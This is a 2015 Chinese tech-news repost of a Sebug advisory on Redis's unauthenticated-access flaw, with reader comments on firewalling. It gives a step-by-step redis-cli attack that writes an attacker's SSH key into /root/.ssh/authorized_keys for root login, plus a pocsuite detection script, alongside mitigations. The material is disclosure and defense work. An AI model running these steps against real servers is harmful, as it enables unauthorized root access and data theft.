Redis 未授权访问缺陷可轻易导致系统被黑 - 开源中国社区
Float_left Icon_close
Redis 未授权访问缺陷可轻易导致系统被黑
oschina 2015年11月12日

Redis 未授权访问缺陷可轻易导致系统被黑

oschina oschina 发布于2015年11月12日 收藏 130 评论 29

【腾讯云】0基础建站 网站模板9元起! >>>  

Sebug 网站公布了 Redis 未授权访问缺陷的详细漏洞信息,这个 Redis 未授权访问缺陷可轻易导致系统被黑。详细内容请看下文:

漏洞概要

Redis 默认情况下,会绑定在 0.0.0.0:6379,这样将会将Redis服务暴露到公网上,如果在没有开启认证的情况下,可以导致任意用户在可以访问目标服务器的情况下未授权访 问Redis以及读取Redis的数据。攻击者在未授权访问Redis的情况下可以利用Redis的相关方法,可以成功将自己的公钥写入目标服务器的 /root/.ssh 文件夹的authotrized_keys 文件中,进而可以直接登录目标服务器。

漏洞概述

Redis 默认情况下,会绑定在 0.0.0.0:6379,这样将会将Redis服务暴露到公网上,如果在没有开启认证的情况下,可以导致任意用户在可以访问目标服务器的情况下未授权访 问Redis以及读取Redis的数据。攻击者在未授权访问Redis的情况下可以利用Redis的相关方法,可以成功将自己的公钥写入目标服务器的 /root/.ssh 文件夹的authotrized_keys 文件中,进而可以直接登录目标服务器。

漏洞描述

Redis 安全模型的观念是: “请不要将Redis暴露在公开网络中, 因为让不受信任的客户接触到Redis是非常危险的” 。

Redis 作者之所以放弃解决未授权访问导致的不安全性是因为, 99.99%使用Redis的场景都是在沙盒化的环境中, 为了0.01%的可能性增加安全规则的同时也增加了复杂性, 虽然这个问题的并不是不能解决的, 但是这在他的设计哲学中仍是不划算的。

因为其他受信任用户需要使用Redis或者因为运维人员的疏忽等原因,部分Redis 绑定在0.0.0.0:6379,并且没有开启认证(这是Redis的默认配置),如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip访问等,将会导致Redis服务直接暴露在公网上,导致其他用户可以直接在非授权情况下直接访问Redis服务并进行相关操作。

利用Redis自身的相关方法,可以进行写文件操作,攻击者可以成功将自己的公钥写入目标服务器的 /root/.ssh 文件夹的authotrized_keys 文件中,进而可以直接登录目标服务器。

漏洞影响

Redis 暴露在公网(即绑定在0.0.0.0:6379,目标IP公网可访问),并且没有开启相关认证和添加相关安全策略情况下可受影响而导致被利用。

通过ZoomEye 的搜索结果显示,有97700在公网可以直接访问的Redis服务。

根据 ZoomEye 最新于2015年11月12日0点探测结果显示:

总的存在无验证可直接利用 Redis 服务的目标全球有49099,其中中国有16477。其中被明着写入crackit的,也就是已经被黑的比例分别是全球65%(3.1万),中国67.5%(1.1万)。

1.1.    漏洞分析与利用

首先在本地生产公私钥文件:

$ssh-keygen –t rsa

然后将公钥写入foo.txt文件

$ (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo.txt

再连接Redis写入文件

$ cat foo.txt | redis-cli -h 192.168.1.11 -x set crackit
$ redis-cli -h 192.168.1.11
$ 192.168.1.11:6379> config set dir /Users/antirez/.ssh/OK
$ 192.168.1.11:6379> config get dir1) "dir"2) "/root/.ssh"
$ 192.168.1.11:6379> config set dbfilename "authorized_keys"OK
$ 192.168.1.11:6379> saveOK

这样就可以成功的将自己的公钥写入/root/.ssh文件夹的authotrized_keys文件里,然后攻击者直接执行:

$ ssh –i  id_rsa root@192.168.1.11

即可远程利用自己的私钥登录该服务器。

当然,写入的目录不限于/root/.ssh 下的authorized_keys,也可以写入用户目录,不过Redis很多以root权限运行,所以写入root目录下,可以跳过猜用户的步骤。

Redis 未授权的其他危害与利用

数据库数据泄露

Redis 作为数据库,保存着各种各样的数据,如果存在未授权访问的情况,将会导致数据的泄露,其中包含保存的用户信息等

代码执行

Redis可以嵌套Lua脚本的特性将会导致代码执行, 危害同其他服务器端的代码执行, 样例如下

一旦攻击者能够在服务器端执行任意代码, 攻击方式将会变得多且复杂, 这是非常危险的.

通过Lua代码攻击者可以调用 redis.sha1hex() 函数,恶意利用 Redis 服务器进行 SHA-1 的破解。

敏感信息泄露

通过 Redis 的 INFO 命令, 可以查看服务器相关的参数和敏感信息, 为攻击者的后续渗透做铺垫

可以看到泄露了很多 Redis 服务器的信息, 有当前 Redis 版本, 内存运行状态, 服务端个数等等敏感信息。

全球无验证可直接利用 Redis 分布情况

全球无验证可直接利用 Redis TOP 10 国家与地区

漏洞 PoC

#!/usr/bin/env python
# -*- coding:utf-8 -*-
import socket
import urlparse
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register
class TestPOC(POCBase):
    vulID = '89339'
    version = '1'
    author = ['Anonymous']
    vulDate = '2015-10-26'
    createDate = '2015-10-26'
    updateDate = '2015-10-26'
    references = ['http://sebug.net/vuldb/ssvid-89339']
    name = 'Redis 未授权访问 PoC'
    appPowerLink = 'http://redis.io/'
    appName = 'Redis'
    appVersion = 'All'
    vulType = 'Unauthorized access'
    desc = '''
        redis 默认不需要密码即可访问,黑客直接访问即可获取数据库中所有信息,造成严重的信息泄露。
    '''
    samples = ['']
    def _verify(self):
        result = {}
        payload = '\x2a\x31\x0d\x0a\x24\x34\x0d\x0a\x69\x6e\x66\x6f\x0d\x0a'
        s = socket.socket()
        socket.setdefaulttimeout(10)
        try:
            host = urlparse.urlparse(self.url).netloc
            port = 6379
            s.connect((host, port))
            s.send(payload)
            recvdata = s.recv(1024)
            if recvdata and 'redis_version' in recvdata:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = self.url
                result['VerifyInfo']['Port'] = port
        except:
            pass
        s.close()
        return self.parse_attack(result)
    def _attack(self):
        return self._verify()
    def parse_attack(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output
register(TestPOC)

解决方案

临时解决方案                            

  1. 配置bind选项, 限定可以连接Redis服务器的IP, 并修改redis的默认端口6379.

  2. 配置AUTH, 设置密码, 密码会以明文方式保存在redis配置文件中.

  3. 配置rename-command CONFIG "RENAME_CONFIG", 这样即使存在未授权访问, 也能够给攻击者使用config指令加大难度

  4. 好消息是Redis作者表示将会开发”real user”,区分普通用户和admin权限,普通用户将会被禁止运行某些命令,如config

官方解决方案                            

暂无官方解决方案

推荐防护方案                            

暂无防护方案

本文转载自 sebug.net

本站文章除注明转载外,均为本站原创或编译。欢迎任何形式的转载,但请务必注明出处,尊重他人劳动共创开源社区。
转载请注明:文章转载自 开源中国社区 [http://www.oschina.net]
本文标题:Redis 未授权访问缺陷可轻易导致系统被黑
分享
评论(29)
最新评论
0
学习了....
0
RabbitMQ的帐号机制就挺好,guest只能本地访问,网络访问需要自己设置新的帐号。
0

引用来自“a358003542”的评论

redis为什么要开外网?不是用途就是和数据库交互的中间层吗?其属于代码和数据库的中间层,考虑代码,靠近数据库,但就是不靠近外网啊。网页的服务具体是数据库提供的,redis是用来加速运算的啊。你们真把redis当数据库用了?那东西连个具体的文件都没有怎么当数据库用啊。

引用来自“南漂一卒”的评论

Redis 不是可以设置自动定期把数据写入硬盘吗?类似 虚拟内存,无需人工维护持久化吧?
如果我没记错的话,redis的这个永久存储特性并不是其主要功能,而且官方上也说,将来将取消这一功能的。
0

引用来自“a358003542”的评论

redis为什么要开外网?不是用途就是和数据库交互的中间层吗?其属于代码和数据库的中间层,考虑代码,靠近数据库,但就是不靠近外网啊。网页的服务具体是数据库提供的,redis是用来加速运算的啊。你们真把redis当数据库用了?那东西连个具体的文件都没有怎么当数据库用啊。
Redis 不是可以设置自动定期把数据写入硬盘吗?类似 虚拟内存,无需人工维护持久化吧?
0
学习了
0
这算是漏洞吗?
0
什么公司会把redis放公网。。。。。
0

引用来自“abcdefghig”的评论

搞安全的快成娱乐圈了。哪个要脸的敢站出来,说这是个漏洞?
对于网站这确实是漏洞,对于Redis来说不算是。
0

引用来自“eechen”的评论

防火墙就只开放ssh(22端口),http(80端口),https(443端口),Ubuntu可以这样做:
sudo ufw enable
sudo ufw default deny
sudo ufw allow 22/tcp
sudo ufw allow 80/tcp
sudo ufw allow 443/tcp
sudo ufw status
可以这样删除:
sudo ufw delete allow 443/tcp
Ubuntu就是简单就是快,就是风骚就是拽!
这怎么说呢,天才的发明,猪头在使用
0
我想起了mysql的test库
0

引用来自“朱__朱”的评论

这得多蠢的运维才会那样配置?
这是开地图炮了,除了某些公司,大部分的运维比你想象得更加那啥。。。
0
天朝白痴一堆
0
搞安全的快成娱乐圈了。哪个要脸的敢站出来,说这是个漏洞?
0

引用来自“知字”的评论

真不知道你们有多聪明,不是说了嘛默认配置,运维管理着成千上万的机器,靠防火墙能挡住内网渗透么,中招太普遍了

引用来自“roy_”的评论

iptables -I INPUT -p tcp --dport 22 -s a.b.c.d -j ACCEPT
iptables -I INPUT -p tcp --dport 6379 -s 192.168.1.111 -j ACCEPT
iptables -A INPUT -j DROP

错了就是错了,再找接口就太丑陋了。作为专业背锅户,如果还自己坑自己,那这路也太累了。
相信大部分还都是root运行的,还得降权
0

引用来自“知字”的评论

真不知道你们有多聪明,不是说了嘛默认配置,运维管理着成千上万的机器,靠防火墙能挡住内网渗透么,中招太普遍了

引用来自“打杂程序猿”的评论

你产品上线用默认配置......怎么说不过去吧...
不见得所有人所有机器每装个应用都要安全配置吧,事实就是如此,总有人疏忽,总有人不重视,有人的参与就会有漏洞
0

引用来自“知字”的评论

真不知道你们有多聪明,不是说了嘛默认配置,运维管理着成千上万的机器,靠防火墙能挡住内网渗透么,中招太普遍了
iptables -I INPUT -p tcp --dport 22 -s a.b.c.d -j ACCEPT
iptables -I INPUT -p tcp --dport 6379 -s 192.168.1.111 -j ACCEPT
iptables -A INPUT -j DROP

错了就是错了,再找接口就太丑陋了。作为专业背锅户,如果还自己坑自己,那这路也太累了。
0
防火墙就只开放ssh(22端口),http(80端口),https(443端口),Ubuntu可以这样做:
sudo ufw enable
sudo ufw default deny
sudo ufw allow 22/tcp
sudo ufw allow 80/tcp
sudo ufw allow 443/tcp
sudo ufw status
可以这样删除:
sudo ufw delete allow 443/tcp
Ubuntu就是简单就是快,就是风骚就是拽!
0

引用来自“知字”的评论

真不知道你们有多聪明,不是说了嘛默认配置,运维管理着成千上万的机器,靠防火墙能挡住内网渗透么,中招太普遍了
你产品上线用默认配置......怎么说不过去吧...
0

引用来自“jQer”的评论

数据库永远不可能放在公网上
不能同意更多。。。
0
redis如果在云主机上跑。建议一定不要放在公网上。如果为了节省成本在有公网的机器上跑。一定用bind绑定在内网地址上。这是运维最基本的法则
顶部